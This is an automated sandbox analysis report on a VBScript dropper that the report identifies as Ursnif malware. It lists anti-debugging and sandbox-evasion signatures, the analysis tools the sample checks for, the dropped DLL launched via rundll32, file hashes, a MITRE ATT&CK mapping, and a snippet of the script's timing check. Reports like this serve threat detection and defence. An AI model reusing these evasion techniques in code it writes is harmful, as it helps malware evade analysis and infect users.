WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_7000EEA1 FindFirstFileExW,

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\SysWOW64\rundll32.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress,

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_700081A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7000EB9A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7004A96D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7004A89C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7004A4A3 push dword ptr fs:[00000030h]

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70001E38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70006707 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: melange.yuv.0.dr

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_700022EB cpuid

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_6FFA10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_6FFA1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	121 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	121 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	13 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	24 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Exploitation for Client Execution	Logon Script (Mac)	Logon Script (Mac)	1 Process Injection	NTDS	13 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	121 Scripting	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	135 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gnAYDP69br2v.vbs	0%	Metadefender		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\melange.yuv	100%	Avira	TR/AD.UrsnifDropper.vsbvn

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
23.2.rundll32.exe.2ca0000.0.unpack	100%	Avira	HEUR/AGEN.1108158		Download File
23.2.rundll32.exe.6ffa0000.2.unpack	100%	Avira	HEUR/AGEN.1210012		Download File

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	560537
Start date:	26.01.2022
Start time:	16:57:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	gnAYDP69br2v.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@6/2@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 3.8% (good quality ratio 3.6%) Quality average: 80.3% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:01:07	API Interceptor	1x Sleep call for process: wscript.exe modified

Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\melange.yuv

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	696320
Entropy (8bit):	6.7012968874378664
Encrypted:	false
SSDEEP:	12288:TOgVktK4arTQrNn4iq0hS7M+M8uFKLrseaCoZSSi7Pq6b4bi:agWtja/QrNn4iqJY8v3sen1Dq3bi
MD5:	E999967D5B4EFD08C2C7FCCE637BC8AA
SHA1:	53B18ED4427ACFE90A6D8B7119942CCE7159B567
SHA-256:	8CD975F66D825DD37B06EF0465D160C65301726CC2A4BDFAD2EAFBAC14536F74
SHA-512:	95B12CAA57C273B6A059FE7E30D451FA447B100851B8C078EEB8E54AC5DB063E7565BCA72A7941BF7393E4E5526279709B586FE9B5F840D1B9B19BB611B1E4FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................L.......z.............~......\|......{.......z....L........~......q.....................}.....Rich............PE..L......W...........!.....X...................p......................................i.....@..........................a..l....a..P............................p...3...8..T............................9..@............p..(............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data...,....p.......\..............@....gfids.......`.......j..............@..@.reloc...3...p...4...l..............@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.767477149162963
TrID:
File name:	gnAYDP69br2v.vbs
File size:	2488066
MD5:	694a1a5ee37e5c161a37d4166a677850
SHA1:	adfdbca254f8f810735cf2224aca1630af762bea
SHA256:	0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
SHA512:	ea02fa36914d4013e3b7323acf97a69535ecb06b72dba1806a9d4eadc03b19e43063d1ee7bf4c86b0fc3a944c9f240e1bb1cd3674e437ec9f3fb403c7f60e324
SSDEEP:	24576:cLx+U9YLFB1Dt2W5P6T8qd76yeD53H9cjnQG8m/cizoANcvc/ZoTnqo/7aU:+RHQG8KqANnK
File Content Preview:	UISA = Timer()..For Ysdhh = 1 to 7..WScript.Sleep 1000:..Next..ASDQWE = Timer()..if ASDQWE - UISA < 5 Then..Do: Asrtd = 4: Loop..End if..const oL = 78..const iH = 95..' provenance denunciate. priggish, maxim Polyphemus lymphoma conscience Becky Gruyere do

File Icon


Icon Hash:	e8d69ece869a9ec4

Target ID:	0
Start time:	16:58:08
Start date:	26/01/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Imagebase:	0x7ff6ebb80000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WmiPrvSE.exePID: 6620, Parent PID: 792

General

Target ID:	21
Start time:	17:01:06
Start date:	26/01/2022
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7e33a0000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: rundll32.exePID: 6788, Parent PID: 6620

General

Target ID:	22
Start time:	17:01:06
Start date:	26/01/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Imagebase:	0x7ff7e5740000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exePID: 6772, Parent PID: 6788

General

Target ID:	23
Start time:	17:01:07
Start date:	26/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Imagebase:	0x250000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gnAYDP69br2v.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection

Compliance

Spreading

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\adobe.url

C:\Users\user\AppData\Local\Temp\melange.yuv

Static File Info

General

File Icon

Network Behavior

Statistics

Behavior

System Behavior

Analysis Process: wscript.exePID: 6536, Parent PID: 3440

General

Analysis Process: WmiPrvSE.exePID: 6620, Parent PID: 792

General

Analysis Process: rundll32.exePID: 6788, Parent PID: 6620

General

Analysis Process: rundll32.exePID: 6772, Parent PID: 6788

General

Disassembly

Windows Analysis Report
gnAYDP69br2v.vbs